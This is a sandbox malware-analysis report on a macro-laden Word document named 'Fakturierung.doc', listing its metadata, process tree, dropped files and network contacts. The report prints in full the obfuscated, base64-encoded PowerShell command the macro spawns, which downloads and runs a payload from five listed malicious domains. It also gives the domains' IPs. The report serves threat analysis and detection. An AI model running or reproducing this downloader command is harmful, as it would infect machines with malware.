Fakturierung

Full analysis: https://app.any.run/tasks/eef96dc7-dddb-4194-bb10-6503b7542ec8
Verdict: Malicious activity
Analysis date: February 18, 2019, 12:29:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 08:21:00 2019, Last Saved Time/Date: Mon Feb 18 08:21:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0
MD5: 42C70DF8E99664B7064CA58D0A01B9F8
SHA1: 127C6532B3684FACFC13420B196EAF349086E235
SHA256: D838F3722647CF9A8729CE91A19B10DDF0DB61DA173593E75FE8E6D8EDA7EF55
SSDEEP: 6144:zG5/BnVfRFJ7KK9aHScdX9znGU431T/e7HJ8biTTCXhcKBMB:z2n9R/lA5dX9znGU2C7p8biaxcKBMB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • poWersheLl.exe (PID: 2416)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3040)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3040)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 9
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 9
Words: 1
Pages: 1
ModifyDate: 2019:02:18 08:21:00
CreateDate: 2019:02:18 08:21:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
All screenshots are available in the full report
Total processes: 35
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 0

Behavior graph (process details are in the full report)

start -> winword.exe (no specs) -> powershell.exe

Process information

PID: 3040
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Fakturierung.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2416
CMD: poWersheLl -e JABGADIAXwBfAF8AMgA9ACgAJwB1ADcANgAnACsAJwA4ACcAKwAnADcANgAnACkAOwAkAGgAXwBfAF8ANQA4ADIANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABWADYAXwBfADUAMAAyAD0AKAAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AbQAnACsAJwBhAHMAagBpAGQAJwArACcAcwBvAGwAJwArACcAYQByACcAKwAnAC4AbgBsAC8AeABNAFAAbgA2ACcAKwAnAFAANABTAFcAYwBfACcAKwAnAE4AbwByADQAJwArACcAagBqAGoAQgBnACcAKwAnAEAAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwB6AG8AJwArACcAbABvAHQAJwArACcAbwB5ACcAKwAnAGsAbAB1ACcAKwAnAGMAJwArACcAaAA2ADkALgAnACsAJwByAHUALwBiAHoAZABEAEoAJwArACcAaABzAFoAUABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AbQAnACsAJwBhAHMAawAnACsAJwAuAHMAJwArACcAdAB1AGQAaQBvAC8ASwB2ACcAKwAnADAAeQB4ACcAKwAnAGsAJwArACcAeQBRACcAKwAnADMANABAAGgAdAB0AHAAJwArACcAOgAvAC8AJwArACcAcwBhAGwAZQBzAHcAbwByAGsALgAnACsAJwBuACcAKwAnAGwALwBIACcAKwAnAGIANAA4AGEAJwArACcASAB5ACcAKwAnADkAVgBuAEEAeQA4AEAAaAAnACsAJwB0AHQAcAA6AC8ALwBjAGwAYQBzAGgAbwBmAGMAJwArACcAbAAnACsAJwBhAG4AJwArACcAcwAnACsAJwBnAGUAJwArACcAbQBzACcAKwAnAC4AJwArACcAbgBsACcAKwAnAC8AdwBlADAAdgAnACsAJwB6AGcAJwArACcAUgAnACsAJwBWAHIAQgBoAHQAXwBuADAAbQBzAGkAWgBYAEoAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQASgBfAF8AMwA3ADUAXwA1AD0AKAAnAGkAJwArACcANwAzADUAOABfACcAKQA7ACQAdwA2AF8AMwA0ADgAXwA3ACAAPQAgACgAJwA1ADQAJwArACcAMAAnACkAOwAkAGsAMQA2ADcANQBfADIAPQAoACcAVgAnACsAJwA2AF8AOQBfADcAJwApADsAJAByAF8AMwA3ADcAXwA1AF8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHcANgBfADMANAA4AF8ANwArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGMAMAA3AF8ANQA2AF8AIABpAG4AIAAkAFYANgBfAF8ANQAwADIAKQB7AHQAcgB5AHsAJABoAF8AXwBfADUAOAAyADQALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAYwAwADcAXwA1ADYAXwAsACAAJAByAF8AMwA3ADcAXwA1AF8AKQA7ACQAYwAyAF8AXwAzADkAMwBfAD0AKAAnAEIAOABfADgAJwArACcAXwBfAF8AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAcgBfADMANwA3AF8ANQBfACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcgBfADMANwA3AF8ANQBfADsAJABvADcAOQA2ADUANAA5AF8APQAoACcAQQAwAF8AJwArACcAXwAnACsAJwBfADUAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHIANwA3ADQAXwBfADUAMgA9ACgAJwB0ADYAMwAnACsAJwBfADEAMAA5ACcAKQA7AA==
Path: C:\Windows\System32\WindowsPowerShell\v1.0\poWersheLl.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 194
Read events: 793
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 2
Unknown types: 4

Dropped files

PID | Process | Filename | Type
3040 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6EA9.tmp.cvr | -
  MD5: -
  SHA256: -
2416 | poWersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0MLZ8WZF6SV7C1QRKECW.temp | -
  MD5: -
  SHA256: -
2416 | poWersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary
  MD5: 6073B6FC66D2E68644893344F6904E4A
  SHA256: 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2416 | poWersheLl.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247b6a.TMP | binary
  MD5: 6073B6FC66D2E68644893344F6904E4A
  SHA256: 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3040 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc
  MD5: D54EF75E542155A03DAEF5B6D413EEBB
  SHA256: 562D35F242B53183D0D079C1C1AD18E899707440C8E0659262664879D6B869B7
3040 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Fakturierung.doc.LNK | lnk
  MD5: EB1386338C27DC9D2B7FF2CF8A5FB463
  SHA256: 457F1A214AAAD6EBAADC8F27A9D115CCA01FF5032BDC85229B99B51303806AE7
3040 | WINWORD.EXE | C:\Users\admin\Desktop\~$kturierung.doc | pgc
  MD5: E7CD6B14BBFB3D351220E2B272F9DB92
  SHA256: 98CC7CFD53E35A9CFAA9071C3FE0468C2AE0DF73D2E007512C3F004CA04EB0CD
3040 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text
  MD5: F9CE6B54C8DB5887AC8C9686B7A0EEF5
  SHA256: 2D0F42375C4B55C9F513F972A772AA5AA5F067A04788906DF94299E5AA67BC5C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 5
DNS requests: 5
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2416 | poWersheLl.exe | GET | 404 | 195.208.1.101:80 | http://zolotoykluch69.ru/bzdDJhsZP | RU | xml | 345 b | malicious
2416 | poWersheLl.exe | GET | 404 | 195.208.1.102:80 | http://mask.studio/Kv0yxkyQ34 | RU | xml | 345 b | malicious
2416 | poWersheLl.exe | GET | 404 | 185.182.56.155:80 | http://masjidsolar.nl/xMPn6P4SWc_Nor4jjjBg | NL | xml | 345 b | malicious
2416 | poWersheLl.exe | GET | 404 | 185.182.57.28:80 | http://saleswork.nl/Hb48aHy9VnAy8 | NL | xml | 345 b | malicious
2416 | poWersheLl.exe | GET | 404 | 185.182.56.159:80 | http://clashofclansgems.nl/we0vzgRVrBht_n0msiZXJ | NL | xml | 345 b | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2416 | poWersheLl.exe | 195.208.1.102:80 | mask.studio | Autonomous Non-commercial Organization Regional Network Information Center | RU | malicious
2416 | poWersheLl.exe | 185.182.56.155:80 | masjidsolar.nl | Astralus B.V. | NL | malicious
2416 | poWersheLl.exe | 195.208.1.101:80 | zolotoykluch69.ru | Autonomous Non-commercial Organization Regional Network Information Center | RU | malicious
2416 | poWersheLl.exe | 185.182.57.28:80 | saleswork.nl | Astralus B.V. | NL | malicious
2416 | poWersheLl.exe | 185.182.56.159:80 | clashofclansgems.nl | Astralus B.V. | NL | malicious

DNS requests

Domain | IP | Reputation
masjidsolar.nl | 185.182.56.155 | malicious
zolotoykluch69.ru | 195.208.1.101 | malicious
mask.studio | 195.208.1.102 | malicious
saleswork.nl | 185.182.57.28 | malicious
clashofclansgems.nl | 185.182.56.159 | malicious

Threats

No threats detected
No debug info